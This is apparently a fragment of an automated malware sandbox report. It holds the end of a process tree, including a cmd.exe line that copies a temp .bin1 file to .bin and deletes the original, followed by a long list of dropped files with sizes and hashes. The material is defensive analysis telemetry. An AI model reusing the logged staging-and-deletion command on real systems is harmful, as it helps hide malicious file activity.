C:\Windows\system32\cmd.execmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5197.bin1 > C:\Users\Admin\AppData\Local\Temp\5197.bin & del C:\Users\Admin\AppData\Local\Temp\5197.bin1"2⤵PID:2172
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:3520
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD5b1978c722926e894cbf897ebf650ba88
SHA1a9bc6f61c7f616d684cb229dd983b4e5ecb02c50
SHA256a7013af9e2e89421d2e84b8ba38d560589473b534e1996808402c5ce63550c90
SHA51283fbd129f82512d15d6401d883e75382ca11c53dc9caf091546d8038710738989bd096f3b288f08d1fa9c1a30f55b6db696815366e97052b285a4494f03859c9
-
Filesize
44B
MD5f7aea2435aa888b709ca20f816c33bfd
SHA138717c9a73b5f8bd399839cbe0aa57518427e758
SHA256f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
SHA5121ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
2KB
MD56bb53db491181e660601e1440f5dc723
SHA1c6691aaad8c7cc09fc3166e38e5c88330c50dae7
SHA2563cc045ad8d52f170514010827086ca8963ec144f3a3ec4beaccd3adcd5808f59
SHA51256147d208569f30f30cabc3f64c19bde4a40c259e5cb61ab378fe902b902d25c80f055286e5abeb92ecc2e88375a06800e95a4161b63737a09c2d7d0be24092f
-
Filesize
2KB
MD5ba1cacc02ab4d42993da9e2a00150c4e
SHA1a27f508c5a3ddd3c702157c07625d57a0ec44d39
SHA2569c76797bc60c4811103cf2ca87581d7a68b8b72b3aece21dcf580a69a0acd366
SHA512808c4c7105940a7610efd63e07bb4494459c47acd794a2f67a13f38df7fd21f65ad7ff2b970c1874bfe54adb8dcc2b07a11062201139887b09d16ecce0b70070
-
Filesize
2KB
MD55a48006096bd97eb23923e47e5a81f6a
SHA165d5f9e89cc05c17980eb41b0f609bf3e956bfa7
SHA256889d10b8b462027785dea9ab3bfe5f5658cb1169b5f4b77219f0411086bf3e60
SHA5122d0913f8e6f597c6bf4561befb168cf9f6ec733125445a611eae7c73ca5861c8c6fc1706519507ab642f29c48616a463b4b558db229d7c2c9ff6dc498f7ecda9
-
Filesize
2KB
MD5eb957e958d464123d032e63278336f4a
SHA1327e49a7ad346aa5bea407fcdf96abbf3e2f7a6e
SHA256fc740bfd640337c775d8f8bacf45526aa6cf162d52c9a67a29448a8e027b3013
SHA512b5a10602d7c09e6634b183ab99bd07dd0153eaa055bf88e8116337b267775c4ff65bcfa24112a4636cae3d5b502002d369795de3a27adf2e4009df2e055fc087
-
Filesize
2KB
MD5eb957e958d464123d032e63278336f4a
SHA1327e49a7ad346aa5bea407fcdf96abbf3e2f7a6e
SHA256fc740bfd640337c775d8f8bacf45526aa6cf162d52c9a67a29448a8e027b3013
SHA512b5a10602d7c09e6634b183ab99bd07dd0153eaa055bf88e8116337b267775c4ff65bcfa24112a4636cae3d5b502002d369795de3a27adf2e4009df2e055fc087
-
Filesize
9KB
MD5c24e1e3d7e76a3f0190c8285a952ba2d
SHA120789bba0b334b28960a0810bc099fbb5af86618
SHA256071261209821a04c5abdaace2bf6ce6a5f14e50228ab55000b4ebd05dd9f35c5
SHA512c0b1b9757dc6310a98cdd62051e2e6d12923b3da6d56cb90ec3e832dd976b1013c5c38b0c7a3ec9b61941ef0cfdaac2c6e4f59db8e62365fd9dadeb914dbc397
-
Filesize
9KB
MD5c24e1e3d7e76a3f0190c8285a952ba2d
SHA120789bba0b334b28960a0810bc099fbb5af86618
SHA256071261209821a04c5abdaace2bf6ce6a5f14e50228ab55000b4ebd05dd9f35c5
SHA512c0b1b9757dc6310a98cdd62051e2e6d12923b3da6d56cb90ec3e832dd976b1013c5c38b0c7a3ec9b61941ef0cfdaac2c6e4f59db8e62365fd9dadeb914dbc397
-
Filesize
35KB
MD5f2440c2ca7c021d3e23515050be042ea
SHA140dbec088209f383f75822fc17e5cec3c81b61b2
SHA256e9d44a4e3e1b2ad225e086d1071b3093b4dfac858363dab3fbfba5fbbd7f575a
SHA512980915c27cdf4ecbcd4e08946c93efefdc6e031863293761ac92abb315e7015008a0a75d713c1599d811d940354097caee5de387f7f922b7f7a03356a2a47874
-
Filesize
35KB
MD5f2440c2ca7c021d3e23515050be042ea
SHA140dbec088209f383f75822fc17e5cec3c81b61b2
SHA256e9d44a4e3e1b2ad225e086d1071b3093b4dfac858363dab3fbfba5fbbd7f575a
SHA512980915c27cdf4ecbcd4e08946c93efefdc6e031863293761ac92abb315e7015008a0a75d713c1599d811d940354097caee5de387f7f922b7f7a03356a2a47874
-
Filesize
64KB
MD5f2eba9bd62ee1de79653a2be84b84e82
SHA1456899ba747afa3ac16412290ea9c6192b426cfd
SHA25682b9d18b500d26de8ed3bb1bdaba12f967fcbc0ebae7545cb1ac7c8dc76461e7
SHA5123e6bd89f2e9e43fdcaaa1f60815c4b0f27a460d0731878b340e5f8f0ccbcdd6a69489a0cd6aeafc942ea97f20e2e9f350aab39a40cd19f1294a63340714caafe
-
Filesize
64KB
MD5f2eba9bd62ee1de79653a2be84b84e82
SHA1456899ba747afa3ac16412290ea9c6192b426cfd
SHA25682b9d18b500d26de8ed3bb1bdaba12f967fcbc0ebae7545cb1ac7c8dc76461e7
SHA5123e6bd89f2e9e43fdcaaa1f60815c4b0f27a460d0731878b340e5f8f0ccbcdd6a69489a0cd6aeafc942ea97f20e2e9f350aab39a40cd19f1294a63340714caafe
-
Filesize
64KB
MD52fe5b90568f0224526b668dfce8690fc
SHA1ddf7904e71def4524be263292b4d0f7a124021f5
SHA256f14971ceea832a3d018d95dc4d210694a2ad75248254ee9dd48eaa0ee0bb3fa0
SHA5127b9c0ad11ed21a46ca5555690047cc97e7e88827f2b1c4171625e19852626dc3e453ea6fcacb66dd82cb8f0cf4f5ce90fe3e7023ff66a1d926564cef667e1ee6
-
Filesize
64KB
MD52fe5b90568f0224526b668dfce8690fc
SHA1ddf7904e71def4524be263292b4d0f7a124021f5
SHA256f14971ceea832a3d018d95dc4d210694a2ad75248254ee9dd48eaa0ee0bb3fa0
SHA5127b9c0ad11ed21a46ca5555690047cc97e7e88827f2b1c4171625e19852626dc3e453ea6fcacb66dd82cb8f0cf4f5ce90fe3e7023ff66a1d926564cef667e1ee6
-
Filesize
64KB
MD569d4bb4fafa07be30e9d02f144dd90df
SHA1bf7b61a62183d31c1ba7a7c2fcf9cc0f8d24d9a8
SHA256558f6c6bacd134f0a35dd2b278ef66feeb0bec567ebb785aea225dd90f0f564e
SHA5122d64dc657ef2c929b68f861e101aa157ef77bfcf86fa21ddc8ddaa775f578f8a136b84caa6139ba7579689530914e1f0db9ed99455e103467066ba6e6781e80c
-
Filesize
64KB
MD57772ff5dc05d71f2ad07ca8f5418a126
SHA1b2fd45c5546bfb40cf4d6904a72be5fde97b4dfa
SHA2561d64cbce762611d8d131d1d3b8a43c9f6722b494c3c6e5b20c0d6ae403a2556c
SHA5128f1765b862d9291a13fa130ab2f4e7d096f79fd6431a93d151a1d90f6693b7c0192370c6df9af9d9bcd66264051c548c2199478ca5697cdc7168a0c5aafdfa27
-
Filesize
64KB
MD52c329b982cf4084062d6eb587c7520ce
SHA15c1dd00777651c6822a2d10825a4f2820da2d324
SHA2562f973f40a634ad144626133bd6b6e9d9517427812e342bc2e299fe1b351e7815
SHA5126f7fbcf5f2c776cdbea8213565ba53a417ad88a50220d34b53c588e8c6a2bca2a3eca7580bc97786e794ddc15166df1442f0704e83469f5f48562950131ba046
-
Filesize
64KB
MD5b1978c722926e894cbf897ebf650ba88
SHA1a9bc6f61c7f616d684cb229dd983b4e5ecb02c50
SHA256a7013af9e2e89421d2e84b8ba38d560589473b534e1996808402c5ce63550c90
SHA51283fbd129f82512d15d6401d883e75382ca11c53dc9caf091546d8038710738989bd096f3b288f08d1fa9c1a30f55b6db696815366e97052b285a4494f03859c9
-
Filesize
1KB
MD54c841c934fa6a78ccf121587f366d0b6
SHA15a4488f8d588f94bcd62cc05baca0f9e20520784
SHA25614f38bbad97561638c6a6c0b185183be9b559b2b4e20e43ac7b773b637df46b7
SHA512a95e76af847c184bcb0373e553fe7ced8390e54ef76673cf2f5218f26bb5302420807958c51a86333fc40a39cc56986742575b0a133ed7dcc5ce08c6833317ea
-
Filesize
1KB
MD5392a9a94fc13026a8f63aba8c69dd50d
SHA1bd9cd8fe89cd05eaaf75b8f4f9b32cb6d7d225fa
SHA25664d1ec13e3d608c07beac5c80da5b8b1a9db08d5b3e0ccbdc188f4c1976aee70
SHA5126827d3a3b1d5e29ec226e5ae64f85bf1480c0880ac5642a870cfd24a360368f709c24f390083d8ef4f100c9dff8673a894e171a0d88fcc65aba6da7643544197
-
Filesize
3KB
MD5b7802039aed10976472f4877a76f820e
SHA1f678a9ee21f18009e0f0d1ddb984e49d36e34448
SHA256b203353eac13acb7f6d839cc66248d8d7b8d0945d653ec97ff3e9fc58882a530
SHA51286433ddeef9a734d635a92a45753f1de23ce9661539709817da4141fb7f6aaedf499c07dbe84908edf197a8a1c8f12471eff9f57654977a8e50f5d5401b7afdc
-
Filesize
3KB
MD520304a71733030087e99660755f37ccf
SHA15a67e4c45d514c3fbec6fb68efa418f01978ec5b
SHA25676f33acda34395c4ed965bd7335187a2f654ce5837141b0de4304f1889c977b3
SHA5123053b927e33a3cf5e95cebf33c59ef417bce62957b492fd34123ae54d80c2c8dec6e116f10cc34e9d72dc1dbb08f8095bb057fa87950e61cf6e327700b3f58d1
-
Filesize
652B
MD5c4def6b5c560f90a9d42b30035510659
SHA10d04c1cbda9e499aaa1f2119f0b7b084789e4574
SHA2561983acd2d6ee9b85d6ff05dac77ba2f7790d7716e746e4a60b7737b872f9b0d0
SHA512258532762891cbfa0bed534d1a56afd5c8fab50b47c7a93c550dfb49ceb26ea52a8fcbdd96355d367941f55d7e9fd400a07c5f066522a2c83911a119b2154b1f
-
Filesize
400B
MD5aca9704199c51fde14b8bf8165bc2a4c
SHA1789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6
-
Filesize
369B
MD520b9b70df3d4658141b57560c7c22a38
SHA10a2352c94ecad22dcba6fa906f67b78dcf3deedc
SHA256c4e57ab90f35af1c50c0ef56cce03a0afbe88f25580ce341517b7090bddadbb5
SHA5124a114c5d889ce18baace7eaea951133fb1f3f4527347932557ef332119973f1251ae1617cd1c068fd7ca73872532424f884e836ce4479f6c0c0e816b027a9aba
-
Filesize
652B
MD5ba06d89e40a9d3b36e8ac118ce494371
SHA1bb93c0c2d25fcdaf02373900cc54ccf82a14a3f6
SHA256fbae2576c9c385dd1d1c62b801ef45b5da0cd382223961289a7affba52a35393
SHA5129b190f0b9e1101bc069105cd1f85683780808fc646f1ba207bc28632bc6af948144952b52be0fb7c4f3116514c6dadeba32c45d5fd2ef445eb387cb021eb9c9d
-
Filesize
410B
MD59a10482acb9e6952b96f4efc24d9d783
SHA15cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28
-
Filesize
369B
MD512ecb4fb620b5882813954a0dd3bbe0c
SHA18c047cfed98be681a04acc40e09928d52eab01c7
SHA256b97bdb663a1661bbaa1f4702bbb32a0dd4c86b19cdf9901be415c16e68489a31
SHA512c7a0e26b9f4ce49b05b49b1781ee34e952f493d1e6b9af284ca1a6ba200fff63c1a55630b9abc1baebb48c53d4f33a18b8822bccda6692e375a490f88b5b0833